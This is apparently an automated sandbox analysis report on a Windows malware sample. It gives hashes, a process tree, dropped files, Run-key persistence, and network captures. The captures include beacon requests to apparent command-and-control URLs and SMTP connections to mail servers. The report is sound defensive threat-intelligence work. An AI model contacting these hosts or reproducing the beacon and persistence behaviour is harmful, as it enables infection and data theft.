Analysis

  • max time kernel
    145s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
  • submitted
    24/04/2024, 20:28 UTC

General

  • Target

    334250dc8b9eb735a57895dd33e8ed26aff426a39f880062be71cea475dc11c6.exe

  • Size

    119KB

  • MD5

    61d1ce1394a03e9888be992eb836f1c8

  • SHA1

    e8a0a43358742522d6ee2e86983c99fc8ff60cc2

  • SHA256

    334250dc8b9eb735a57895dd33e8ed26aff426a39f880062be71cea475dc11c6

  • SHA512

    05cf347c79f56fb9a45e37c01a1c2c7efb644b171412f57b0b86ce14ef8f92cbb26e3327f921d7300483f749dadc398acfa05daba1dc3d78fb31bda6102ac411

  • SSDEEP

    3072:TOjWuyt0ZsqsXOKofHfHTXQLzgvnzHPowYbvrjD/L7QPbg/Dr0T3rnXLHf7zjPPh:TIs9OKofHfHTXQLzgvnzHPowYbvrjD/E

Score
9/10

Malware Config

Signatures

  • UPX dump on OEP (original entry point) 13 IoCs
  • ACProtect 1.3x - 1.4x DLL software 1 IoCs

    Detects file using ACProtect software.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 9 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Maps connected drives based on registry 3 TTPs 6 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 12 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Program crash 1 IoCs
  • Modifies registry class 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\334250dc8b9eb735a57895dd33e8ed26aff426a39f880062be71cea475dc11c6.exe
    "C:\Users\Admin\AppData\Local\Temp\334250dc8b9eb735a57895dd33e8ed26aff426a39f880062be71cea475dc11c6.exe"
    1⤵
    • Loads dropped DLL
    • Adds Run key to start application
    • Maps connected drives based on registry
    • Drops file in System32 directory
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:2244
    • C:\Windows\SysWOW64\ctfmen.exe
      ctfmen.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2536
      • C:\Windows\SysWOW64\smnss.exe
        C:\Windows\system32\smnss.exe
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Adds Run key to start application
        • Maps connected drives based on registry
        • Drops file in System32 directory
        • Drops file in Program Files directory
        • Modifies registry class
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2744
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2744 -s 856
          4⤵
          • Loads dropped DLL
          • Program crash
          PID:2456

Network

  • flag-us
    DNS
    shssmmasen.biz
    smnss.exe
    Remote address:
    8.8.8.8:53
    Request
    shssmmasen.biz
    IN A
    Response
    shssmmasen.biz
    IN A
    34.91.32.224
  • flag-nl
    GET
    http://shssmmasen.biz/imgs/krewa/nqxa.php?id=4076kxuk&s5=3159&lip=10.127.0.134&win=fWinS
    smnss.exe
    Remote address:
    34.91.32.224:80
    Request
    GET /imgs/krewa/nqxa.php?id=4076kxuk&s5=3159&lip=10.127.0.134&win=fWinS HTTP/1.1
    Host: shssmmasen.biz
    User-Agent: explwer
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 24 Apr 2024 20:28:42 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=cede0fbc288439db6fdf8d0085806c89|191.101.209.39|1713990522|1713990522|0|1|0; path=/; domain=.shssmmasen.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
  • flag-us
    DNS
    gzip.org
    smnss.exe
    Remote address:
    8.8.8.8:53
    Request
    gzip.org
    IN MX
    Response
    gzip.org
    IN MX
  • flag-us
    DNS
    alumni.caltech.edu
    smnss.exe
    Remote address:
    8.8.8.8:53
    Request
    alumni.caltech.edu
    IN MX
    Response
    alumni.caltech.edu
    IN MX
    alumni-caltech-edu.mail.protection.outlook.com
  • flag-us
    DNS
    alumni.caltech.edu
    smnss.exe
    Remote address:
    8.8.8.8:53
    Request
    alumni.caltech.edu
    IN MX
  • flag-us
    DNS
    alumni.caltech.edu
    smnss.exe
    Remote address:
    8.8.8.8:53
    Request
    alumni.caltech.edu
    IN MX
  • flag-us
    DNS
    megginson.com
    smnss.exe
    Remote address:
    8.8.8.8:53
    Request
    megginson.com
    IN MX
    Response
    megginson.com
    IN MX
    alt1.aspmx.l.google.com
    megginson.com
    IN MX
    alt2.aspmx.l.google.com
    megginson.com
    IN MX
    aspmx.l.google.com
    megginson.com
    IN MX
    aspmx2.googlemail.com
    megginson.com
    IN MX
    aspmx3.googlemail.com
    megginson.com
    IN MX
    aspmx4.googlemail.com
    megginson.com
    IN MX
    aspmx5.googlemail.com
  • flag-us
    DNS
    megginson.com
    smnss.exe
    Remote address:
    8.8.8.8:53
    Request
    megginson.com
    IN MX
  • flag-us
    DNS
    megginson.com
    smnss.exe
    Remote address:
    8.8.8.8:53
    Request
    megginson.com
    IN MX
  • flag-us
    DNS
    megginson.com
    smnss.exe
    Remote address:
    8.8.8.8:53
    Request
    megginson.com
    IN MX
    Response
    megginson.com
    IN MX
    alt1.aspmx.l.google.com
    megginson.com
    IN MX
    alt2.aspmx.l.google.com
    megginson.com
    IN MX
    aspmx.l.google.com
    megginson.com
    IN MX
    aspmx2.googlemail.com
    megginson.com
    IN MX
    aspmx3.googlemail.com
    megginson.com
    IN MX
    aspmx4.googlemail.com
    megginson.com
    IN MX
    aspmx5.googlemail.com
  • flag-us
    DNS
    alt2.aspmx.l.google.com
    smnss.exe
    Remote address:
    8.8.8.8:53
    Request
    alt2.aspmx.l.google.com
    IN A
    Response
    alt2.aspmx.l.google.com
    IN A
    74.125.200.27
  • flag-us
    DNS
    jk.uni-linz.ac.at
    smnss.exe
    Remote address:
    8.8.8.8:53
    Request
    jk.uni-linz.ac.at
    IN MX
    Response
    jk.uni-linz.ac.at
    IN MX
    mail3.edvz.uni-linz.ac.at
    jk.uni-linz.ac.at
    IN MX
    mail4.edvz.uni-linz.ac.at
    jk.uni-linz.ac.at
    IN MX
    mail1.edvz.uni-linz.ac.at
    jk.uni-linz.ac.at
    IN MX
    mail2.edvz.uni-linz.ac.at
  • flag-us
    DNS
    mail4.edvz.uni-linz.ac.at
    smnss.exe
    Remote address:
    8.8.8.8:53
    Request
    mail4.edvz.uni-linz.ac.at
    IN A
    Response
    mail4.edvz.uni-linz.ac.at
    IN A
    140.78.3.82
  • flag-us
    DNS
    peenapsear.in
    smnss.exe
    Remote address:
    8.8.8.8:53
    Request
    peenapsear.in
    IN A
    Response
    peenapsear.in
    IN A
    34.94.245.237
  • flag-us
    GET
    http://peenapsear.in/imgs/krewa/nqxa.php?id=4076kxuk&s5=3159&lip=10.127.0.134&win=fWinS
    smnss.exe
    Remote address:
    34.94.245.237:80
    Request
    GET /imgs/krewa/nqxa.php?id=4076kxuk&s5=3159&lip=10.127.0.134&win=fWinS HTTP/1.1
    Host: peenapsear.in
    User-Agent: explwer
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 24 Apr 2024 20:28:48 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=7629c27edb3531dcd3021bca7ad8fa3d|191.101.209.39|1713990528|1713990528|0|1|0; path=/; domain=.peenapsear.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
  • flag-us
    DNS
    alt1.aspmx.l.google.com
    smnss.exe
    Remote address:
    8.8.8.8:53
    Request
    alt1.aspmx.l.google.com
    IN A
    Response
    alt1.aspmx.l.google.com
    IN A
    142.250.150.26
  • flag-us
    DNS
    cdata.tvnet.hu
    smnss.exe
    Remote address:
    8.8.8.8:53
    Request
    cdata.tvnet.hu
    IN MX
    Response
    cdata.tvnet.hu
    IN MX
    (MX target name unreadable in capture)
  • flag-us
    DNS
    attbi.com
    smnss.exe
    Remote address:
    8.8.8.8:53
    Request
    attbi.com
    IN MX
    Response
  • flag-us
    DNS
    attbi.com
    smnss.exe
    Remote address:
    8.8.8.8:53
    Request
    attbi.com
    IN MX
  • flag-us
    DNS
    attbi.com
    smnss.exe
    Remote address:
    8.8.8.8:53
    Request
    attbi.com
    IN MX
  • flag-us
    DNS
    cdata.tvnet.hu
    smnss.exe
    Remote address:
    8.8.8.8:53
    Request
    cdata.tvnet.hu
    IN A
    Response
  • flag-us
    DNS
    courtesan.com
    smnss.exe
    Remote address:
    8.8.8.8:53
    Request
    courtesan.com
    IN MX
    Response
    courtesan.com
    IN MX
    millert.dev
  • flag-us
    DNS
    millert.dev
    smnss.exe
    Remote address:
    8.8.8.8:53
    Request
    millert.dev
    IN A
    Response
    millert.dev
    IN A
    65.102.237.118
  • flag-us
    DNS
    bigelowandholmes.com
    smnss.exe
    Remote address:
    8.8.8.8:53
    Request
    bigelowandholmes.com
    IN MX
    Response
  • flag-us
    DNS
    bigelowandholmes.com
    smnss.exe
    Remote address:
    8.8.8.8:53
    Request
    bigelowandholmes.com
    IN MX
  • 34.91.32.224:80
    http://shssmmasen.biz/imgs/krewa/nqxa.php?id=4076kxuk&s5=3159&lip=10.127.0.134&win=fWinS
    http
    smnss.exe
    403 B
    582 B
    6
    4

    HTTP Request

    GET http://shssmmasen.biz/imgs/krewa/nqxa.php?id=4076kxuk&s5=3159&lip=10.127.0.134&win=fWinS

    HTTP Response

    200
  • 74.125.200.27:25
    alt2.aspmx.l.google.com
    smnss.exe
    152 B
    3
  • 140.78.3.82:25
    mail4.edvz.uni-linz.ac.at
    smnss.exe
    152 B
    3
  • 34.94.245.237:80
    http://peenapsear.in/imgs/krewa/nqxa.php?id=4076kxuk&s5=3159&lip=10.127.0.134&win=fWinS
    http
    smnss.exe
    642 B
    581 B
    6
    4

    HTTP Request

    GET http://peenapsear.in/imgs/krewa/nqxa.php?id=4076kxuk&s5=3159&lip=10.127.0.134&win=fWinS

    HTTP Response

    200
  • 142.250.150.26:25
    alt1.aspmx.l.google.com
    smnss.exe
    152 B
    3
  • 8.8.8.8:53
    shssmmasen.biz
    dns
    smnss.exe
    60 B
    76 B
    1
    1

    DNS Request

    shssmmasen.biz

    DNS Response

    34.91.32.224

  • 8.8.8.8:53
    gzip.org
    dns
    smnss.exe
    54 B
    70 B
    1
    1

    DNS Request

    gzip.org

  • 8.8.8.8:53
    alumni.caltech.edu
    dns
    smnss.exe
    192 B
    126 B
    3
    1

    DNS Request

    alumni.caltech.edu

    DNS Request

    alumni.caltech.edu

    DNS Request

    alumni.caltech.edu

  • 8.8.8.8:53
    megginson.com
    dns
    smnss.exe
    177 B
    235 B
    3
    1

    DNS Request

    megginson.com

    DNS Request

    megginson.com

    DNS Request

    megginson.com

  • 8.8.8.8:53
    megginson.com
    dns
    smnss.exe
    59 B
    235 B
    1
    1

    DNS Request

    megginson.com

  • 8.8.8.8:53
    alt2.aspmx.l.google.com
    dns
    smnss.exe
    69 B
    85 B
    1
    1

    DNS Request

    alt2.aspmx.l.google.com

    DNS Response

    74.125.200.27

  • 8.8.8.8:53
    jk.uni-linz.ac.at
    dns
    smnss.exe
    63 B
    156 B
    1
    1

    DNS Request

    jk.uni-linz.ac.at

  • 8.8.8.8:53
    mail4.edvz.uni-linz.ac.at
    dns
    smnss.exe
    71 B
    87 B
    1
    1

    DNS Request

    mail4.edvz.uni-linz.ac.at

    DNS Response

    140.78.3.82

  • 8.8.8.8:53
    peenapsear.in
    dns
    smnss.exe
    59 B
    75 B
    1
    1

    DNS Request

    peenapsear.in

    DNS Response

    34.94.245.237

  • 8.8.8.8:53
    alt1.aspmx.l.google.com
    dns
    smnss.exe
    69 B
    85 B
    1
    1

    DNS Request

    alt1.aspmx.l.google.com

    DNS Response

    142.250.150.26

  • 8.8.8.8:53
    cdata.tvnet.hu
    dns
    smnss.exe
    60 B
    76 B
    1
    1

    DNS Request

    cdata.tvnet.hu

  • 8.8.8.8:53
    attbi.com
    dns
    smnss.exe
    165 B
    110 B
    3
    1

    DNS Request

    attbi.com

    DNS Request

    attbi.com

    DNS Request

    attbi.com

  • 8.8.8.8:53
    cdata.tvnet.hu
    dns
    smnss.exe
    60 B
    122 B
    1
    1

    DNS Request

    cdata.tvnet.hu

  • 8.8.8.8:53
    courtesan.com
    dns
    smnss.exe
    59 B
    86 B
    1
    1

    DNS Request

    courtesan.com

  • 8.8.8.8:53
    millert.dev
    dns
    smnss.exe
    57 B
    73 B
    1
    1

    DNS Request

    millert.dev

    DNS Response

    65.102.237.118

  • 8.8.8.8:53
    bigelowandholmes.com
    dns
    smnss.exe
    132 B
    125 B
    2
    1

    DNS Request

    bigelowandholmes.com

    DNS Request

    bigelowandholmes.com

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Windows\SysWOW64\satornas.dll

    Filesize

    183B

    MD5

    d52157a0bea2382b1c7ec165210c2302

    SHA1

    6e4c32f0d48cce491a937295df54e40773f1f893

    SHA256

    c4be80435ecbc68441af74ae297478bc36addc922c50bbf8ed1794cf2a2d169e

    SHA512

    bb434a61045abc141ff7492cfdebba5bef9b8b6b34a119a61a5f3647b775c02bf2ee4d002261cdd3ad33528caedef2776acad0cf538717914d865edf67274467

  • C:\Windows\SysWOW64\smnss.exe

    Filesize

    119KB

    MD5

    4a844e4658df7aae6ec904bc10fc0075

    SHA1

    245a795dad17e3a2c8b75386a0243c3014414cbc

    SHA256

    0ef04ce70b6782442d2dfd13ba1f8dfa442b8078c1db8f1547959dc348869930

    SHA512

    fc443b3f57736fb05ba5a3bbdc8cc5f1d58755f702cd59d5c1f7ede57c1380883a8df3be1a51e898be8ac06a2b0f4398115fcf1fdd3b5e12ddabb49085fc2424

  • \Windows\SysWOW64\ctfmen.exe

    Filesize

    4KB

    MD5

    bc3c41c9a088b88a21d6285ea87a6f10

    SHA1

    6a6a86e8267fca71bf5b58c6f0c2defe1c88b8e6

    SHA256

    dc0987d6fb19fff2dde4dbc86ea8e33f9c1b4a3ab1cbd79d96313b99d31d1e65

    SHA512

    185cf6b01daf004dbb5702f2c8dc620f3501d9f379295299983bc2a4b221c374ecf5ed1d3c1c3dd25e91b54b1be493a63b29c749f9ca411bbcd3f3bb4c67e4f6

  • \Windows\SysWOW64\shervans.dll

    Filesize

    8KB

    MD5

    c983fa5c88fa921587313a9ad37027c7

    SHA1

    fbe3a7bf061b202c0f3152fad4247e07f0c95be3

    SHA256

    25801230ae269cae6665f88bc690a5d738320b3cfb5c26e5b5ef4caa75f0b134

    SHA512

    c465bad3d14949f157e90d20f25ac98d4caf1a85c0754fb4b49d78e94a90d9852d5d7cb0b63bc23a06d56a0da76d5170bc81c8dae9d20a7bc4c8f74765a500f8

  • memory/2244-18-0x0000000000350000-0x0000000000359000-memory.dmp

    Filesize

    36KB

  • memory/2244-0-0x0000000000400000-0x0000000000420000-memory.dmp

    Filesize

    128KB

  • memory/2244-31-0x0000000000400000-0x0000000000420000-memory.dmp

    Filesize

    128KB

  • memory/2244-24-0x0000000010000000-0x000000001000D000-memory.dmp

    Filesize

    52KB

  • memory/2244-14-0x0000000010000000-0x000000001000D000-memory.dmp

    Filesize

    52KB

  • memory/2536-33-0x0000000000320000-0x0000000000340000-memory.dmp

    Filesize

    128KB

  • memory/2536-26-0x0000000000400000-0x0000000000409000-memory.dmp

    Filesize

    36KB

  • memory/2536-47-0x0000000000320000-0x0000000000340000-memory.dmp

    Filesize

    128KB

  • memory/2744-38-0x0000000000400000-0x0000000000420000-memory.dmp

    Filesize

    128KB

  • memory/2744-41-0x0000000010000000-0x000000001000D000-memory.dmp

    Filesize

    52KB

  • memory/2744-45-0x0000000010000000-0x000000001000D000-memory.dmp

    Filesize

    52KB

  • memory/2744-48-0x0000000000400000-0x0000000000420000-memory.dmp

    Filesize

    128KB
